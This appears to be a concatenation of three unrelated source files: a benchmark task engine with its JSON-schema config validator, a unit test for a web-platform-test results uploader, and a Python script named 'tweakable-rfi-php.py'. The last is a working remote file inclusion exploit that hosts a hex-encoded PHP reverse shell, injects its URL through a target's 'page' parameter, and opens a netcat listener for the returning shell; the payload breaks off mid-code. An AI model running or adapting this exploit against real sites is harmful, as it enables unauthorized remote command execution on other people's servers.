for k, v in ctx.items():
context_config[context.Context.get(k).get_fullname()] = v
context_obj = {
"task": self.task,
"owner_id": owner_id,
"scenario_name": scenario_name,
"config": context_config
}
return context_obj
@logging.log_task_wrapper(LOG.info, "Running task.")
def run(self):
"""Run the benchmark according to the test configuration.
Test configuration is specified on engine initialization.
:returns: List of dicts, each dict containing the results of all the
corresponding benchmark test launches
"""
self.task.update_status(consts.TaskStatus.RUNNING)
try:
for subtask in self.config.subtasks:
self._run_subtask(subtask)
except TaskAborted:
LOG.info("Received aborting signal.")
self.task.update_status(consts.TaskStatus.ABORTED)
else:
if objects.Task.get_status(
self.task["uuid"]) != consts.TaskStatus.ABORTED:
self.task.update_status(consts.TaskStatus.FINISHED)
def _run_subtask(self, subtask):
subtask_obj = self.task.add_subtask(title=subtask["title"],
description=subtask["description"],
context=subtask["context"])
try:
# TODO(astudenov): add subtask context here
for workload in subtask["workloads"]:
self._run_workload(subtask_obj, workload)
except TaskAborted:
subtask_obj.update_status(consts.SubtaskStatus.ABORTED)
raise
except Exception:
subtask_obj.update_status(consts.SubtaskStatus.CRASHED)
# TODO(astudenov): save error to DB
LOG.exception("Unexpected exception during the subtask execution")
# NOTE(astudenov): crash task after exception in subtask
self.task.update_status(consts.TaskStatus.CRASHED)
raise
else:
subtask_obj.update_status(consts.SubtaskStatus.FINISHED)
def _run_workload(self, subtask_obj, workload):
if ResultConsumer.is_task_in_aborting_status(self.task["uuid"]):
raise TaskAborted()
workload_obj = subtask_obj.add_workload(
name=workload["name"],
description=workload["description"],
position=workload["position"],
runner=workload["runner"],
runner_type=workload["runner_type"],
hooks=workload["hooks"],
context=workload["contexts"],
sla=workload["sla"],
args=workload["args"])
workload["uuid"] = workload_obj["uuid"]
workload_cfg = objects.Workload.to_task(workload)
LOG.info("Running workload: \n"
" position = %(position)s\n"
" config = %(cfg)s"
% {"position": workload["position"],
"cfg": json.dumps(workload_cfg, indent=3)})
runner_cls = runner.ScenarioRunner.get(workload["runner_type"])
runner_obj = runner_cls(self.task, workload["runner"])
context_obj = self._prepare_context(
workload["contexts"], workload["name"], workload_obj["uuid"])
try:
with ResultConsumer(workload, self.task, subtask_obj, workload_obj,
runner_obj, self.abort_on_sla_failure):
with context.ContextManager(context_obj):
runner_obj.run(workload["name"], context_obj,
workload["args"])
except Exception:
LOG.exception("Unexpected exception during the workload execution")
# TODO(astudenov): save error to DB
class TaskConfig(object):
"""Version-aware wrapper around task.
"""
CONFIG_SCHEMA_V1 = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"patternProperties": {
".*": {
"type": "array",
"items": {
"type": "object",
"properties": {
"args": {"type": "object"},
"description": {
"type": "string"
},
"runner": {
"type": "object",
"properties": {"type": {"type": "string"}},
"required": ["type"]
},
"context": {"type": "object"},
"sla": {"type": "object"},
"hooks": {
"type": "array",
"items": {"$ref": "#/definitions/hook"},
}
},
"additionalProperties": False
}
}
},
"definitions": {
"hook": {
"type": "object",
"properties": {
"name": {"type": "string"},
"description": {"type": "string"},
"args": {},
"trigger": {
"type": "object",
"properties": {
"name": {"type": "string"},
"args": {},
},
"required": ["name", "args"],
"additionalProperties": False,
}
},
"required": ["name", "args", "trigger"],
"additionalProperties": False,
}
}
}
CONFIG_SCHEMA_V2 = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"version": {"type": "number"},
"title": {"type": "string", "maxLength": 128},
"description": {"type": "string"},
"tags": {
"type": "array",
"items": {"type": "string"}
},
"subtasks": {
"type": "array",
"minItems": 1,
"items": {
"oneOf": [
{"$ref": "#/definitions/subtask-workload"},
{"$ref": "#/definitions/subtask-workloads"}
]
}
}
},
"additionalProperties": False,
"required": ["title", "subtasks"],
"definitions": {
"singleEntity": {
"type": "object",
"minProperties": 1,
"maxProperties": 1,
"patternProperties": {
".*": {"type": "object"}
}
},
"subtask-workload": {
"type": "object",
"properties": {
"title": {"type": "string", "maxLength": 128},
"group": {"type": "string"},
"description": {"type": "string"},
"tags": {
"type": "array",
"items": {"type": "string", "maxLength": 255}
},
"scenario": {"$ref": "#/definitions/singleEntity"},
"runner": {"$ref": "#/definitions/singleEntity"},
"sla": {"type": "object"},
"hooks": {
"type": "array",
"items": {"$ref": "#/definitions/hook"},
},
"contexts": {"type": "object"}
},
"additionalProperties": False,
"required": ["title", "scenario", "runner"]
},
"subtask-workloads": {
"type": "object",
"properties": {
"title": {"type": "string"},
"group": {"type": "string"},
"description": {"type": "string"},
"tags": {
"type": "array",
"items": {"type": "string", "maxLength": 255}
},
"run_in_parallel": {"type": "boolean"},
"workloads": {
"type": "array",
"minItems": 1,
"items": {
"type": "object",
"properties": {
"scenario": {
"$ref": "#/definitions/singleEntity"},
"description": {"type": "string"},
"runner": {
"$ref": "#/definitions/singleEntity"},
"sla": {"type": "object"},
"hooks": {
"type": "array",
"items": {"$ref": "#/definitions/hook"},
},
"contexts": {"type": "object"}
},
"additionalProperties": False,
"required": ["scenario"]
}
}
},
"additionalProperties": False,
"required": ["title", "workloads"]
},
"hook": {
"type": "object",
"oneOf": [
{
"properties": {
"name": {"type": "string"},
"description": {"type": "string"},
"args": {},
"trigger": {
"type": "object",
"properties": {
"name": {"type": "string"},
"args": {},
},
"required": ["name", "args"],
"additionalProperties": False,
}
},
"required": ["name", "args", "trigger"],
"additionalProperties": False
},
{
"properties": {
"action": {
"type": "object",
"minProperties": 1,
"maxProperties": 1,
"patternProperties": {".*": {}}
},
"trigger": {"$ref": "#/definitions/singleEntity"},
"description": {"type": "string"},
},
"required": ["action", "trigger"],
"additionalProperties": False
},
]
}
}
}
CONFIG_SCHEMAS = {1: CONFIG_SCHEMA_V1, 2: CONFIG_SCHEMA_V2}
def __init__(self, config):
"""TaskConfig constructor.
Validates and represents different versions of task configuration in
unified form.
:param config: Dict with configuration of specified task
:raises Exception: in case of validation error. (This gets reraised as
InvalidTaskException. if we raise it here as InvalidTaskException,
then "Task config is invalid: " gets prepended to the message twice
"""
if config is None:
raise Exception("Input task is empty")
self.version = self._get_version(config)
self._validate_version()
self._validate_json(config)
if self.version == 1:
config = self._adopt_task_format_v1(config)
self.title = config.get("title", "Task")
self.tags = config.get("tags", [])
self.description = config.get("description")
self.subtasks = []
for sconf in config["subtasks"]:
sconf = copy.deepcopy(sconf)
# fill all missed properties of a SubTask
sconf.setdefault("tags", [])
sconf.setdefault("description", "")
# port the subtask to a single format before validating
if "workloads" not in sconf and "scenario" in sconf:
workload = sconf
sconf = {"title": workload.pop("title"),
"description": workload.pop("description"),
"tags": workload.pop("tags"),
"workloads": [workload]}
# it is not supported feature yet, but the code expects this
# variable
sconf.setdefault("context", {})
workloads = []
for position, wconf in enumerate(sconf["workloads"]):
# fill all missed properties of a Workload
wconf["name"], wconf["args"] = list(
wconf["scenario"].items())[0]
del wconf["scenario"]
wconf["position"] = position
if not wconf.get("description", ""):
try:
wconf["description"] = scenario.Scenario.get(
wconf["name"]).get_info()["title"]
except (exceptions.PluginNotFound,
exceptions.MultiplePluginsFound):
# let's fail an issue with loading plugin at a
# validation step
pass
wconf.setdefault("contexts", {})
if "runner" in wconf:
runner = list(wconf["runner"].items())[0]
wconf["runner_type"], wconf["runner"] = runner
else:
wconf["runner_type"] = "serial"
wconf["runner"] = {}
wconf.setdefault("sla", {"failure_rate": {"max": 0}})
hooks = wconf.get("hooks", [])
wconf["hooks"] = []
for hook_cfg in hooks:
if "name" in hook_cfg:
LOG.warning("The deprecated format of hook is found. "
"Check task format documentation for more "
"details.")
trigger_cfg = hook_cfg["trigger"]
wconf["hooks"].append({
"description": hook_cfg["description"],
"action": (hook_cfg["name"], hook_cfg["args"]),
"trigger": (
trigger_cfg["name"], trigger_cfg["args"])})
else:
hook_cfg["action"] = list(
hook_cfg["action"].items())[0]
hook_cfg["trigger"] = list(
hook_cfg["trigger"].items())[0]
wconf["hooks"].append(hook_cfg)
workloads.append(wconf)
sconf["workloads"] = workloads
self.subtasks.append(sconf)
# if self.version == 1:
# TODO(ikhudoshyn): Warn user about deprecated format
@staticmethod
def _get_version(config):
return config.get("version", 1)
def _validate_version(self):
if self.version not in self.CONFIG_SCHEMAS:
allowed = ", ".join([str(k) for k in self.CONFIG_SCHEMAS])
msg = ("Task configuration version %s is not supported. "
"Supported versions: %s") % (self.version, allowed)
raise exceptions.InvalidTaskException(msg)
def _validate_json(self, config):
try:
jsonschema.validate(config, self.CONFIG_SCHEMAS[self.version])
except Exception as e:
raise exceptions.InvalidTaskException(str(e))
@staticmethod
def _adopt_task_format_v1(config):
subtasks = []
for name, v1_workloads in config.items():
for v1_workload in v1_workloads:
subtask = copy.deepcopy(v1_workload)
subtask["scenario"] = {name: subtask.pop("args", {})}
subtask["contexts"] = subtask.pop("context", {})
subtask["title"] = name
if "runner" in subtask:
runner_type = subtask["runner"].pop("type")
subtask["runner"] = {runner_type: subtask["runner"]}
if "hooks" in subtask:
hooks = subtask["hooks"]
subtask["hooks"] = []
for hook_cfg in hooks:
trigger_cfg = hook_cfg["trigger"]
subtask["hooks"].append(
{"description": hook_cfg.get("description"),
"action": {
hook_cfg["name"]: hook_cfg["args"]},
"trigger": {
trigger_cfg["name"]: trigger_cfg["args"]}}
)
subtasks.append(subtask)
return {"title": "Task (adopted from task format v1)",
"subtasks": subtasks}
|
upload_wpt_results_test.py | # Copyright 2018 The WPT Dashboard Project. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import BaseHTTPServer
import gzip
import json
import os
import shutil
import subprocess
import sys
import tempfile
import threading
import unittest
here = os.path.dirname(os.path.abspath(__file__))
gsutil_stub_dir = os.path.sep.join([here, 'gsutil-stub'])
gsutil_stub_args = os.path.sep.join([gsutil_stub_dir, 'gsutil_args.json'])
gsutil_stub_content = os.path.sep.join([gsutil_stub_dir, 'content-to-upload'])
upload_bin = os.path.sep.join(
[here, '..', 'src', 'scripts', 'upload-wpt-results.py']
)
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def log_message(*argv):
pass
def do_POST(self):
body_length = int(self.headers['Content-Length'])
self.server.requests.append({
'path': self.path,
'body': str(self.rfile.read(body_length))
})
self.send_response(self.server.status_code)
self.send_header('Content-type', 'text/html')
self.end_headers()
def make_results():
return {
'1_of_2.json': {
'results': [
{
'test': '/js/bitwise-or.html',
'status': 'OK',
'subtests': []
},
{
'test': '/js/bitwise-and.html',
'status': 'OK',
'subtests': [
{'status': 'FAIL', 'message': 'bad', 'name': 'first'},
{'status': 'FAIL', 'message': 'bad', 'name': 'second'}
]
}
]
},
'2_of_2.json': {
'results': [
{
'test': '/js/bitwise-or-2.html',
'status': 'OK',
'subtests': []
}
]
}
}
class TestUploadWptResults(unittest.TestCase):
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.server = None
# gsutil "stub" output files and directories will only be present if
# the tests were run previously
try:
os.remove(gsutil_stub_args)
except OSError:
pass
try:
shutil.rmtree(gsutil_stub_content)
except OSError:
pass
def tearDown(self):
try:
shutil.rmtree(self.temp_dir)
except OSError:
pass
if self.server:
self.server.shutdown()
self.server.server_close()
self.server_thread.join()
def upload(self, browser_name, browser_version, os_name, os_version,
results_dir, results, port, gsutil_return_code=0):
env = dict(os.environ)
env['PATH'] = gsutil_stub_dir + os.pathsep + os.environ['PATH']
env['GSUTIL_RETURN_CODE'] = str(gsutil_return_code)
for filename in results:
with open(os.path.join(results_dir, filename), 'w') as handle:
json.dump(results[filename], handle)
proc = subprocess.Popen([
upload_bin, '--raw-results-directory', results_dir,
'--platform-id', '%s-%s-%s-%s' % (browser_name, browser_version,
os_name, os_version),
'--browser-name', browser_name,
'--browser-version', browser_version,
'--os-name', os_name,
'--os-version', os_version,
'--wpt-revision', '1234567890abcdef',
'--wpt-revision-date', '2018-03-19T17:54:32-04:00',
'--bucket-name', 'wpt-test',
'--notify-url', 'http://localhost:%s' % port,
'--notify-secret', 'fake-secret'
], env=env, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
return (proc.returncode, stdout, stderr)
def assertJsonFiles(self, dir_name, data):
for filename in data:
path = os.path.sep.join([dir_name] + filename.split('/'))
with gzip.open(path) as handle:
self.assertEqual(data[filename], json.loads(handle.read()))
def start_server(self, port):
self.server = BaseHTTPServer.HTTPServer(('', port), Handler)
self.server.status_code = 201
self.server.requests = []
def target(server):
server.serve_forever()
self.server_thread = threading.Thread(
target=target, args=(self.server,)
)
self.server_thread.start()
def test_basic_firefox(self):
self.start_server(9801)
returncode, stdout, stderr = self.upload('firefox',
'2.0',
'linux',
'4.0',
self.temp_dir,
make_results(),
9801)
self.assertEqual(returncode, 0, stderr)
self.assertJsonFiles(gsutil_stub_content, {
'firefox-2.0-linux-4.0-summary.json.gz': {
'/js/bitwise-and.html': [1, 3],
'/js/bitwise-or-2.html': [1, 1],
'/js/bitwise-or.html': [1, 1]
},
'firefox-2.0-linux-4.0/js/bitwise-and.html': {
'test': '/js/bitwise-and.html',
'status': 'OK',
'subtests': [
{u'message': 'bad', 'name': 'first', 'status': 'FAIL'},
{u'message': 'bad', 'name': 'second', 'status': 'FAIL'}
]
},
'firefox-2.0-linux-4.0/js/bitwise-or.html': {
'test': '/js/bitwise-or.html',
'status': 'OK',
'subtests': []
},
'firefox-2.0-linux-4.0/js/bitwise-or-2.html': {
'test': '/js/bitwise-or-2.html',
'status': u'OK',
'subtests': []
}
})
self.assertEqual(len(self.server.requests), 1)
request = self.server.requests[0]
self.assertEqual(request['path'], '/?secret=fake-secret')
self.assertEqual(json.loads(request['body']), {
'browser_name': 'firefox',
'browser_version': '2.0',
'commit_date': '2018-03-19T17:54:32-04:00',
'os_name': 'linux',
'os_version': '4.0',
'results_url': 'https://storage.googleapis.com/' +
'wpt-test/1234567890/' +
'firefox-2.0-linux-4.0-summary.json.gz',
'revision': '1234567890'
})
def test_basic_chrome(self):
self.start_server(9802)
returncode, stdout, stderr = self.upload('chrome',
'4.3.2',
'macos',
'10.5',
self.temp_dir,
make_results(),
port=9802)
self.assertEqual(returncode, 0, stderr)
self.assertJsonFiles(gsutil_stub_content, {
'chrome-4.3.2-macos-10.5-summary.json.gz': {
'/js/bitwise-and.html': [1, 3],
'/js/bitwise-or-2.html': [1, 1],
'/js/bitwise-or.html': [1, 1]
},
'chrome-4.3.2-macos-10.5/js/bitwise-and.html': {
'test': '/js/bitwise-and.html',
'status': 'OK',
'subtests': [
{u'message': 'bad', 'name': 'first', 'status': 'FAIL'},
{u'message': 'bad', 'name': 'second', 'status': 'FAIL'}
]
},
'chrome-4.3.2-macos-10.5/js/bitwise-or.html': {
'test': '/js/bitwise-or.html',
'status': 'OK',
'subtests': []
},
'chrome-4.3.2-macos-10.5/js/bitwise-or-2.html': {
'test': '/js/bitwise-or-2.html',
'status': u'OK',
'subtests': []
}
})
self.assertEqual(len(self.server.requests), 1)
request = self.server.requests[0]
self.assertEqual(request['path'], '/?secret=fake-secret')
self.assertEqual(json.loads(request['body']), {
'browser_name': 'chrome',
'browser_version': '4.3.2',
'commit_date': '2018-03-19T17:54:32-04:00',
'os_name': 'macos',
'os_version': '10.5',
'results_url': 'https://storage.googleapis.com/' +
'wpt-test/1234567890/' +
'chrome-4.3.2-macos-10.5-summary.json.gz',
'revision': '1234567890'
})
def test_expand_foreign_platform(self):
self.start_server(9802)
returncode, stdout, stderr = self.upload('chrome',
'4.3.2',
'beos',
'*',
self.temp_dir,
make_results(),
port=9802)
self.assertNotEqual(returncode, 0, stdout)
self.assertEqual(len(self.server.requests), 0)
def test_failed_request(self):
self.start_server(9804)
self.server.status_code = 500
returncode, stdout, stderr = self.upload('chrome',
'4.3.2',
'linux',
'4.0',
self.temp_dir,
make_results(),
port=9804)
self.assertNotEqual(returncode, 0, stdout)
self.assertEqual(len(self.server.requests), 1)
def test_no_server(self):
returncode, stdout, stderr = self.upload('chrome',
'4.3.2',
'linux',
'4.0',
self.temp_dir,
make_results(),
port=9802)
self.assertNotEqual(returncode, 0, stdout)
def test_failed_gsutil(self):
self.start_server(9801)
returncode, stdout, stderr = self.upload('chrome',
'3.2.1',
'linux',
'4.0',
self.temp_dir,
make_results(),
port=9801,
gsutil_return_code=1)
self.assertEqual(returncode, 1, stdout)
self.assertEqual(len(self.server.requests), 0)
def test_duplicated_results(self):
self.start_server(9802)
duplicated_results = make_results()
duplicated_results['2_of_2.json']['results'].append(
duplicated_results['1_of_2.json']['results'][0]
)
returncode, stdout, stderr = self.upload('firefox',
'1.0.1',
'linux',
'4.0',
self.temp_dir,
duplicated_results,
port=9801)
self.assertEqual(returncode, 1, stdout)
self.assertFalse(os.access(gsutil_stub_content, os.R_OK))
self.assertEqual(len(self.server.requests), 0)
if __name__ == '__main__':
unittest.main()
|
tweakable-rfi-php.py | #! /usr/bin/env python3
from sys import argv
from requests import get
from os import path, mkdir, system, remove, rmdir
from socketserver import TCPServer
from http.server import BaseHTTPRequestHandler
from threading import Thread, Timer
def main():
if len(argv) != 4:
print('Usage: exploit.py target listener_ip listener_port')
exit(-1)
target = argv[1]
ip = argv[2]
port = argv[3]
Timer(3, exploit, args=(target, ip, port)).start()
start_listener(port)
def exploit(target, ip, port):
p = prepare_payload(ip, port)
with TCPServer(("", 80), generate_handler({'/p.php': 'application/octet-stream'})) as httpd:
print("serving at port", 80)
Thread(target=req, args=(target, p)).start()
httpd.handle_request()
httpd.server_close()
cleanup()
def generate_handler(files=None):
if files is None:
files = {}
class MyHandler(BaseHTTPRequestHandler):
def do_GET(self):
"""Respond to a GET request."""
if self.path in files.keys():
content_type = files[self.path]
content = open('./exp/p.php').read()
self.send_response(200)
self.send_header("Content-type", content_type)
self.end_headers()
self.wfile.write(content.encode())
else:
self.send_error(404)
return MyHandler
def start_listener(port):
system('nc -nlvp {0}'.format(port))
def prepare_payload(ip, port):
if not path.exists('./exp'):
mkdir('./exp')
with open('./exp/p.php', 'w') as payload_file:
payload_file.write(bytes.fromhex(get_base_payload()).decode('UTF-8').replace("Shell('localhost', 4444)",
"Shell('{0}', {1})".format(ip,
port)))
return 'http://' + ip + '/p.php'
def cleanup():
if path.exists('./exp/p.php'):
remove('./exp/p.php')
if path.exists('./exp'):
rmdir('./exp')
def req(target, p):
if 'http' not in target:
target = 'http://' + target
if '/' not in target[7:]:
target = target + '/site/index.php'
get(target, params={"page": p})
def get_base_payload():
return '3c3f7068700a2f2f20436f70797269676874202863292032303230204976616e20c5a0696e63656b0a2f2f2076322e340a2f2f205265717569726573205048502076352e302e30206f7220677265617465722e0a2f2f20576f726b73206f6e204c696e7578204f532c206d61634f532c20616e642057696e646f7773204f532e0a2f2f2053656520746865206f726967696e616c207363726970742061742068747470733a2f2f6769746875622e636f6d2f70656e746573746d6f6e6b65792f7068702d726576657273652d7368656c6c2e0a636c617373205368656c6c207b0a202020207072697661746520246164647220203d206e756c6c3b0a20202020707269766174652024706f727420203d206e756c6c3b0a202020207072697661746520246f73202020203d206e756c6c3b0a202020207072697661746520247368656c6c203d206e756c6c3b0a2020202070726976617465202464657363726970746f7273706563203d206172726179280a202020202020202030203d3e206172726179282770697065272c20277227292c202f2f207368656c6c2063616e20726561642066726f6d20535444494e0a202020202020202031203d3e206172726179282770697065272c20277727292c202f2f207368656c6c2063616e20777269746520746f205354444f55540a202020202020202032203d3e206172726179282770697065272c202777272920202f2f207368656c6c2063616e20777269746520746f205354444552520a20202020293b0a2020202070726976617465202462756666657220203d20313032343b202020202f2f20726561642f7772697465206275666665722073697a650a20202020707269766174652024636c656e202020203d20303b202020202020202f2f20636f6d6d616e64206c656e6774680a202020207072697661746520246572726f722020203d2066616c73653b2020202f2f2073747265616d20726561642f7772697465206572726f720a202020207075626c69632066756e6374696f6e205f5f636f6e7374727563742824616464722c2024706f727429207b0a202020202020202024746869732d3e61646472203d2024616464723b0a202020202020202024746869732d3e706f7274203d2024706f72743b0a202020207d0a20202020707269766174652066756e6374696f6e206465746563742829207b0a2020202020202020246465746563746564203d20747275653b0a20202020202020206966202873747269706f73285048505f4f532c20274c494e5558272920213d3d2066616c736529207b202f2f2073616d6520666f72206d61634f530a20202020202020202020202024746869732d3e6f73202020203d20274c494e5558273b0a20202020202020202020202024746869732d3e7368656c6c203d20272f62696e2f7368273b0a20202020202020207d20656c7365206966202873747269706f73285048505f4f532c202757494e3332272920213d3d2066616c7365207c7c2073747269706f73285048505f4f532c202757494e4e54272920213d3d2066616c7365207c7c2073747269706f73285048505f4f532c202757494e444f5753272920213d3d2066616c736529207b0a20202020202020202020202024746869732d3e6f73202020203d202757494e444f5753273b0a20202020202020202020202024746869732d3e7368656c6c203d2027636d642e657865273b0a20202020202020207d20656c7365207b0a202020202020202020202020246465746563746564203d2066616c73653b0a2020202020202020202020206563686f20225359535f4552524f523a20556e6465726c79696e67206f7065726174696e672073797374656d206973206e6f7420737570706f727465642c207363726970742077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e202464657465637465643b0a202020207d0a20202020707269766174652066756e6374696f6e206461656d6f6e697a652829207b0a20202020202020202465786974203d2066616c73653b0a2020202020202020696620282166756e6374696f6e5f657869737473282770636e746c5f666f726b272929207b0a2020202020202020202020206563686f20224441454d4f4e495a453a2070636e746c5f666f726b282920646f6573206e6f74206578697374732c206d6f76696e67206f6e2e2e2e5c6e223b0a20202020202020207d20656c736520696620282824706964203d204070636e746c5f666f726b282929203c203029207b0a2020202020202020202020206563686f20224441454d4f4e495a453a2043616e6e6f7420666f726b206f66662074686520706172656e742070726f636573732c206d6f76696e67206f6e2e2e2e5c6e223b0a20202020202020207d20656c7365206966202824706964203e203029207b0a2020202020202020202020202465786974203d20747275653b0a2020202020202020202020206563686f20224441454d4f4e495a453a204368696c642070726f6365737320666f726b6564206f6666207375636365737366756c6c792c20706172656e742070726f636573732077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d20656c73652069662028706f7369785f7365747369642829203c203029207b0a2020202020202020202020202f2f206f6e6365206461656d6f6e697a656420796f752077696c6c2061637475616c6c79206e6f206c6f6e67657220736565207468652073637269707427732064756d700a2020202020202020202020206563686f20224441454d4f4e495a453a20466f726b6564206f66662074686520706172656e742070726f63657373206275742063616e6e6f74207365742061206e6577205349442c206d6f76696e67206f6e20617320616e206f727068616e2e2e2e5c6e223b0a20202020202020207d20656c7365207b0a2020202020202020202020206563686f20224441454d4f4e495a453a20436f6d706c65746564207375636365737366756c6c79215c6e223b0a20202020202020207d0a202020202020202072657475726e2024657869743b0a202020207d0a20202020707269766174652066756e6374696f6e2073657474696e67732829207b0a2020202020202020406572726f725f7265706f7274696e672830293b0a2020202020202020407365745f74696d655f6c696d69742830293b202f2f20646f206e6f7420696d706f7365207468652073637269707420657865637574696f6e2074696d65206c696d69740a202020202020202040756d61736b2830293b202f2f20736574207468652066696c652f6469726563746f7279207065726d697373696f6e73202d2036363620666f722066696c657320616e642037373720666f72206469726563746f726965730a202020207d0a20202020707269766174652066756e6374696f6e2064756d7028246461746129207b0a20202020202020202464617461203d207374725f7265706c61636528273c272c2027266c743b272c202464617461293b0a20202020202020202464617461203d207374725f7265706c61636528273e272c20272667743b272c202464617461293b0a20202020202020206563686f2024646174613b0a202020207d0a20202020707269766174652066756e6374696f6e2072656164282473747265616d2c20246e616d652c202462756666657229207b0a202020202020202069662028282464617461203d20406672656164282473747265616d2c20246275666665722929203d3d3d2066616c736529207b202f2f20737570707265737320616e206572726f72207768656e2072656164696e672066726f6d206120636c6f73656420626c6f636b696e672073747265616d0a20202020202020202020202024746869732d3e6572726f72203d20747275653b202020202020202020202020202020202020202020202020202020202f2f2073657420676c6f62616c206572726f7220666c61670a2020202020202020202020206563686f20225354524d5f4552524f523a2043616e6e6f7420726561642066726f6d207b246e616d657d2c207363726970742077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e2024646174613b0a202020207d0a20202020707269766174652066756e6374696f6e207772697465282473747265616d2c20246e616d652c20246461746129207b0a20202020202020206966202828246279746573203d2040667772697465282473747265616d2c2024646174612929203d3d3d2066616c736529207b202f2f20737570707265737320616e206572726f72207768656e2077726974696e6720746f206120636c6f73656420626c6f636b696e672073747265616d0a20202020202020202020202024746869732d3e6572726f72203d20747275653b202020202020202020202020202020202020202020202020202020202f2f2073657420676c6f62616c206572726f7220666c61670a2020202020202020202020206563686f20225354524d5f4552524f523a2043616e6e6f7420777269746520746f207b246e616d657d2c207363726970742077696c6c206e6f7720657869742e2e2e5c6e223b0a20202020202020207d0a202020202020202072657475726e202462797465733b0a202020207d0a202020202f2f20726561642f7772697465206d6574686f6420666f72206e6f6e2d626c6f636b696e672073747265616d730a20202020707269766174652066756e6374696f6e2072772824696e7075742c20246f75747075742c2024696e616d652c20246f6e616d6529207b0a20202020202020207768696c652028282464617461203d2024746869732d3e726561642824696e7075742c2024696e616d652c2024746869732d3e62756666657229292026262024746869732d3e777269746528246f75747075742c20246f6e616d652c2024646174612929207b0a2020202020202020202020206966202824746869732d3e6f73203d3d3d202757494e444f57532720262620246f6e616d65203d3d3d2027535444494e2729207b2024746869732d3e636c656e202b3d207374726c656e282464617461293b207d202f2f2063616c63756c6174652074686520636f6d6d616e64206c656e6774680a20202020202020202020202024746869732d3e64756d70282464617461293b202f2f2073637269707427732064756d700a20202020202020207d0a202020207d0a202020202f2f20726561642f7772697465206d6574686f6420666f7220626c6f636b696e672073747265616d732028652e672e20666f72205354444f555420616e6420535444455252206f6e2057696e646f7773204f53290a202020202f2f207765206d7573742072656164207468652065786163742062797465206c656e6774682066726f6d20612073747265616d20616e64206e6f7420612073696e676c652062797465206d6f72650a20202020707269766174652066756e6374696f6e206272772824696e7075742c20246f75747075742c2024696e616d652c20246f6e616d6529207b0a2020202020202020246673746174203d2066737461742824696e707574293b0a20202020202020202473697a65203d202466737461745b2773697a65275d3b0a20202020202020206966202824746869732d3e6f73203d3d3d202757494e444f5753272026262024696e616d65203d3d3d20275354444f5554272026262024746869732d3e636c656e29207b0a2020202020202020202020202f2f20666f7220736f6d6520726561736f6e2057696e646f7773204f5320706970657320535444494e20696e746f205354444f55540a2020202020202020202020202f2f20776520646f206e6f74206c696b6520746861740a2020202020202020202020202f2f207765206e65656420746f20646973636172642074686520646174612066726f6d207468652073747265616d0a2020202020202020202020207768696c65202824746869732d3e636c656e203e20302026262028246279746573203d2024746869732d3e636c656e203e3d2024746869732d3e627566666572203f2024746869732d3e627566666572203a2024746869732d3e636c656e292026262024746869732d3e726561642824696e7075742c2024696e616d652c202462797465732929207b0a2020202020202020202020202020202024746869732d3e636c656e202d3d202462797465733b0a202020202020202020202020202020202473697a65202d3d202462797465733b0a2020202020202020202020207d0a20202020202020207d0a20202020202020207768696c6520282473697a65203e20302026262028246279746573203d202473697a65203e3d2024746869732d3e627566666572203f2024746869732d3e627566666572203a202473697a652920262620282464617461203d2024746869732d3e726561642824696e7075742c2024696e616d652c2024627974657329292026262024746869732d3e777269746528246f75747075742c20246f6e616d652c2024646174612929207b0a2020202020202020202020202473697a65202d3d202462797465733b0a20202020202020202020202024746869732d3e64756d70282464617461293b202f2f2073637269707427732064756d700a20202020202020207d0a202020207d0a202020207075626c69632066756e6374696f6e2072756e2829207b0a20202020202020206966202824746869732d3e6465746563742829202626202124746869732d3e6461656d6f6e697a65282929207b0a20202020202020202020202024746869732d3e73657474696e677328293b0a0a2020202020202020202020202f2f202d2d2d2d2d20534f434b455420424547494e202d2d2d2d2d0a20202020202020202020202024736f636b6574203d204066736f636b6f70656e2824746869732d3e616464722c2024746869732d3e706f72742c20246572726e6f2c20246572727374722c203330293b0a202020202020202020202020696620282124736f636b657429207b0a202020202020202020202020202020206563686f2022534f435f4552524f523a207b246572726e6f7d3a207b246572727374727d5c6e223b0a2020202020202020202020207d20656c7365207b0a2020202020202020202020202020202073747265616d5f7365745f626c6f636b696e672824736f636b65742c2066616c7365293b202f2f207365742074686520736f636b65742073747265616d20746f206e6f6e2d626c6f636b696e67206d6f6465207c2072657475726e7320277472756527206f6e2057696e646f7773204f530a0a202020202020202020202020202020202f2f202d2d2d2d2d205348454c4c20424547494e202d2d2d2d2d0a202020202020202020202020202020202470726f63657373203d204070726f635f6f70656e2824746869732d3e7368656c6c2c2024746869732d3e64657363726970746f72737065632c202470697065732c206e756c6c2c206e756c6c293b0a2020202020202020202020202020202069662028212470726f6365737329207b0a20202020202020202020202020202020202020206563686f202250524f435f4552524f523a2043616e6e6f7420737461727420746865207368656c6c5c6e223b0a202020202020202020202020202020207d20656c7365207b0a2020202020202020202020202020202020202020666f7265616368202824706970657320617320247069706529207b0a20202020202020202020202020202020202020202020202073747265616d5f7365745f626c6f636b696e672824706970652c2066616c7365293b202f2f2073657420746865207368656c6c2073747265616d7320746f206e6f6e2d626c6f636b696e67206d6f6465207c2072657475726e73202766616c736527206f6e2057696e646f7773204f530a20202020202020202020202020202020202020207d0a0a20202020202020202020202020202020202020202f2f202d2d2d2d2d20574f524b20424547494e202d2d2d2d2d0a202020202020202020202020202020202020202024737461747573203d2070726f635f6765745f737461747573282470726f63657373293b0a2020202020202020202020202020202020202020406677726974652824736f636b65742c2022534f434b45543a205368656c6c2068617320636f6e6e656374656421205049443a207b247374617475735b27706964275d7d5c6e22293b0a2020202020202020202020202020202020202020646f207b0a20202020202020202020202020202020202020202020202024737461747573203d2070726f635f6765745f737461747573282470726f63657373293b0a2020202020202020202020202020202020202020202020206966202866656f662824736f636b65742929207b202f2f20636865636b20666f7220656e642d6f662d66696c65206f6e20534f434b45540a202020202020202020202020202020202020202020202020202020206563686f2022534f435f4552524f523a205368656c6c20636f6e6e656374696f6e20686173206265656e207465726d696e617465645c6e223b20627265616b3b0a2020202020202020202020202020202020202020202020207d20656c7365206966202866656f66282470697065735b315d29207c7c2021247374617475735b2772756e6e696e67275d29207b2020202020202020